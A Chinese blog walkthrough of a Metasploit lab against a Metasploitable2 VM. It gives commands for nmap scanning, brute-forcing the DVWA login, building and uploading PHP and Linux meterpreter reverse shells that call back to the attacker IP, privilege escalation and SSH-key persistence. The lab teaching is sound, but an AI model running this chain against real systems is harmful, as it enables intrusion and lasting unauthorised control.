4、Metasploit系列----未知目标测试

最新推荐文章于 2022-12-23 11:44:38 发布
最新推荐文章于 2022-12-23 11:44:38 发布
阅读量463 收藏
点赞数
分类专栏: 安全 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/128301914
版权

靶机Metasploitable2:192.168.11.105

攻击机kail:192.168.11.106

一、创建工作空间

显示数据库未连接:
使用 msfdb init 对数据进行初始化:
db_status 显示数据库已连接。
使用命令 workspace -a 192.168.11.105 创建目标工作空间。

二、信息搜集

在msf中使用db_nmap 调用nmap对目标进行扫描:
保存在数据库中, 使用 services 查看保存结果:
对于http端口,使用http_version搜索相关版本信息
使用命令 search http_version 查找相关信息:
使用 use 进入模块, set 配置, run 运行:
由结果可知,是PHP应用。
通过http运行的web程序进行渗透测试;对web程序,使用 dir_scanner模块对目录进行扫描。
破解DVWA的用户密码
nmap -p80 --script http-form-brute --script-args http-form-brute.path=/dvwa/login.php 192.168.11.105 -d
得到用户密码: admin/password
使用命令: msfvenom -l payload | grep php | grep meterpreter  筛选php后渗透模块的payload.
选择php/meterpreter_reverse_tcp模块,使用命令: msfvenom -p  php/meterpreter_reverse_tcp lost=192.168.11.106 lport=4445 -o /home/shell.php指定payload模块设置监听地址及监听端口,并指定生成文件的地址。可以看到成功生成shell.php文件
上传shell.php文件:
报错: Your image was not uploaded,并不是如下图期望的结果:

三、打开msf设置监听

使用命令  use exploit/multi/handler 配置监听模块:
set payload php/meterpreter_reverse_tcp   (此处的payload一定要和上方生成的payload的是同一个模块)
set lhost 192.168.11.106     设置监听的ip
set lport 4445     设置监听端口
浏览器上访问上传的shell.php文件 http://192.168.11.105/dvwa/hackable/uploads/shell.php ,msf会生成相关的会话:
由于生成的会话不稳定(会话被中断,执行run重新访问上传的shell.php即可),且 php meterpreter 不具有meterpreter完整功能,因此可以继续上传elf的meterpreter获取更多操作功能。
使用命令 msfvenom -l payload | grep linux | grep meterpreter 筛选Linux后渗透测试payload:
使用命令: msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.11.106 lport=4443 -f elf -o /home/shell.elf 生成payload:
使用刚才通过的上传php获得的meterpreter,上传生成的shell.elf
upload /home/shell.elf  上传成功:
使用 dir 查看已经成功上传shell.elf, 且具备执行权限(若文件不具备执行权限则使用命令对文件添加权限)
再打开一个msf监听,监听上传的exe会话:
set payload linux/x86/meterpreter_reverse_tcp
set lhost 192.168.11.106 
set lport 4443
在通过的上传php获得的meterpreter,使用命令 execute -f shell.elf 执行上传的exe:
可在新打开的msf中建立相关的会话:
此时获得权限认为web服务层面的权限
使用 getuid 查看当前会话权限,非root权限,需要提权:获取system权限
输入 bg 进行会话保存:
使用命令  use post/multi/recon/local_exploit_suggester 配置相关参数检测是否存在 提权 模块:
使用提示的模块进行提权:获得system权限
维持权限
使用 post/linux/manage目录下得sshkey_persistence模块实现对Linux服务的持续控制
use post/linux/manage/sshkey_persistence
show options
set session 4 (使用具有root权限的session)
run
执行后会生成私钥文件:
直接使用命令  ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa   root@[目标ip] -i [私钥文件路径] 直接登录目标机器:若报错请参考 Solution to openssh-8.8-p1 update: no matching host key type found. Their offer: ssh-rsa :: /dev/ttyS3 — 回首向来萧瑟处 也无荒野也无灯

四、参考

青霄
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试-认识Metesploit.pdf
02-25
Metasploit是一个流行的渗透测试工具,它提供了一系列的模块,用于信息搜集、漏洞分析、漏洞利用、后渗透攻击等。本文档是关于渗透测试及其在Metasploit中的应用的读书笔记,其内容涵盖了渗透测试的分类、标准的渗透...
SQLMap 扫描利用SQL注入
无痕的博客
12-21 1386
SQLmap工具安装更新,结合DVWA演示使用
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3288
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
目标检测』目标检测 — 基础知识
libo-coder
12-09 1431
一、目标检测方法分类 第一,已知目标的先验知识 在这种情况下检测目标有两类方法: (1)用目标的先验知识训练一堆弱分类器,然后这些弱分类器一起投票来检测目标; (2)根据先验知识找到目标和非目标的最佳划分线 第二,未知目标的先验知识 此时不知道要检测的目标是什么,于是什么是目标就有了不同的定义。 (1)检测场景中的显著目标,如通过一些特征表达出场景中每个像素的显著性概率,然后找到显著目标。 (2)检测场景当中的运动目标。 二、经典前背景分离目标检测方法 2.1 背景差分法 在检测运动目标时,如果背景
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6969
生成木马进行植入
Unknown-Aware Object Detection:Learning What You Don’t Know from Videos in the Wild(未知目标检测)CVPR 2022
qq_54828577的博客
07-25 1887
构建能够检测出分布外(OOD)对象的可靠的目标检测器至关重要,但尚未得到充分的研究。关键的挑战之一是,模型缺乏来自未知数据的监督信号,导致对OOD对象的预测过于自信。我们提出了一种新的,通过,从野生视频中提取未知对象,并有意义地规范化模型的决策边界。STUD首先在空间维度上识别未知的候选物体建议,然后将多个视频帧中的候选物体聚集起来,形成决策边界附近的多样化未知物体集。同时,我们采用了基于能量的不确定性正则化损失,它形成了不确定性在分布和蒸馏的未知对象之间的空间。......
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
最新发布
12-29
4. **配置参数**:根据目标环境设置模块参数,例如目标IP地址、端口、payload等。payload是你要在目标系统上执行的代码,例如创建一个持久性的后门。 5. **运行攻击**:使用`run`命令启动攻击。如果一切顺利,...
CTF-WEB入门DOC-2019版1
08-03
4. 后门管理:如Metasploit Framework,用于模拟攻击。 5. SQL注入工具:如sqlmap。 6. XSS接收面板:用于收集XSS攻击的数据。 7. 服务器管理:如SSH客户端,用于远程管理服务器。 六、成长路径: 从基础漏洞开始...
mona-master.zip
05-13
Mona.py,这款由Corelan Team精心打造的工具,是安全研究者和渗透测试人员的得力助手,它集成了自动构建Return-Oriented Programming (ROP)链以及Metasploit计算偏移量的功能,大大提升了在漏洞利用过程中的效率。...
Metasploit可执行后门.doc
12-01
4. Metasploit可执行后门的风险 Metasploit可执行后门也存在一定的风险,例如: * 安全风险:使用Metasploit可执行后门可能会导致目标系统的安全性下降,甚至导致系统崩溃。 * 法律风险:使用Metasploit可执行后门...
CVPR 2022 | 未知目标检测模块STUD:学习视频中的未知目标
CV技术指南(微信公众号)
06-06 1507
欢迎关注公众号CV技术指南,专注于计算机视觉的技术总结、最新技术跟踪、经典论文解读、CV招聘信息。论文:Unknown-Aware Object Detection: Learning What You Don't Know from Videos in the Wild论文:https://arxiv.org/abs/2203.03800代码:https://github.com/deeplearning-wisc/stud目标检测模型在被训练的已知上下文中已经取得了巨大的成功,但是在处理网络训练时没有接
Metasploit系列----未知目标测试
bronze_s的博客
05-08 423
攻击机器:kali 192.168.1.8 目标机器:windows2003 192.168.1.7 操作步骤 创建工作空间 显示数据库未连接 使用msfdb init对数据进行初始化 使用命令db_status查看数据库状态信息,显示数据库已连接。 使用命令workspace -a 192.168.1.7创建目标工作空间。 信息搜集 测试目标连通性:ping 192.168.1.7(ping -c 3 ip :ping三次后结束 和 ping 使用ctrl+c结束) 测试目标服务:在msf中使
Cobalt Strike与Metasploit会话互转
zzgslh的博客
03-20 1011
Cobalt Strike与Metasploit会话互转 一、前言 Cobalt Strike和Metasploit是渗透测试经常会用到的两个工具,Cobalt Strike 与 Metasploit在很多地方都是兼容的,所以我们便可以将 Metasploit攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit上。 二、Metasploit会话转到Cobaltstrike (1)首先通过Metasploit获取会话。 (2)会话
Metasploit渗透测试魔鬼训练营》学习笔记
热门推荐
weixin_40133285的博客
05-16 4万+
Metasploit渗透测试魔鬼训练营 诸葛建伟 陈力波 孙松柏 王衍 田繁 学习笔记 |Linux Metasploitable | Linux靶机 | 下载vmware虚拟机镜像 |WinXP Metasploitable | Windows靶机 | 下载vmware虚拟机镜像 |OWASP BWA | Web服务器靶机| 下载vmware虚拟机镜像 |Win2K3 Metasploitable |Windows靶机 | 下载vmware虚拟机镜像
【渗透测试Metasploit从入门到精通(1)
m0_70746078的博客
09-25 1631
渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。通过渗透测试可以知道目标机构的计算机系统是否易于受到攻击,现有的安全部署是否能妥善地抵御攻击,以及哪部分安全机制可能被绕过,等等。渗透测试的主要目的是改善目标机构的安全性。
网络攻击实验【部分】- 结果可能有区别:系统不同【可能对你有帮助】
小源同学的博客
11-14 4022
文章目录第一步Whois查询IP查询使用kali的host 和 dig 命令查询域名信息,使用dnsenum 和 dnsrecon 枚举域名hostdnsenum通过metaploit进行目录结构分析打开metaploit找到的渗透模块【了解】目录结构分析【dir_scanner为例】拓补结构用Nmap确定操作系统类型nmap扫描远程端口通过metasploit http_version 模块确定版本号搜索你要扫描的服务模块设置目标的IP,然后run一下用Goby 进行漏洞扫描下载Goby【免费】下载好后直
Metasploit -- FTP、Telnet和http服务探测
weixin_41489908的博客
05-12 515
半个小时前接到了一个陌生电话,竟然是曾经暗恋的女生打过来的。原来我藏在魔方转轴处的“我喜欢你”的纸条,被她不到一岁的儿子在玩的时候摔了出来。这个魔方是我在五年前送给她的生日礼物。她在电话里哭成了泪人,最后我和她说,曾经我爱过好多人,做过无数浪漫的事,她们现在都很幸福,希望你也是。。。。。 ---- 网易云热评 一、FTP服务探测 1、搜索ftp相关模块:search ftp type:auxiliary 2、选择模块:useauxiliary/scanner/ftp/ftp_version ..
Metasploit服务扫描(HTTP、MYSQL)
robacco的博客
03-19 952
利用Metasploit Scanner辅助模块自动化服务扫描 搜索你要扫描的服务模块,然后使用该模块,这里以http为例: search http_version use auxiliary/scanner/http/http_version show options 接着设置目标的IP,即你要扫描的目标系统(可以是整个局域网下的所有主机),然后run一下,开始扫描,下面是扫描结果: ...
metasploit快速入门
weixin_33834679的博客
08-07 202
  今天没上班,在小黑屋里看了一个一百多页的书《metasploit新手指南》,在此将笔记分享给大家。欢迎大家批评指正,共同学习进步。 metasploit新手指南 笔记kali 0x01metapoit基本文件结构如下: config metasploit的环境配置信息,数据库配置信息data渗透后模块的一些工具及payload,第三方小工具集合,用...
metasploitframework-latest
07-13
4. 切换到克隆下来的 metasploit-framework 目录: ``` cd metasploit-framework ``` 5. 安装依赖项。在终端中运行以下命令: ``` bundle install ``` 6. 安装完成后,你可以通过以下命令启动 Metasploit ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值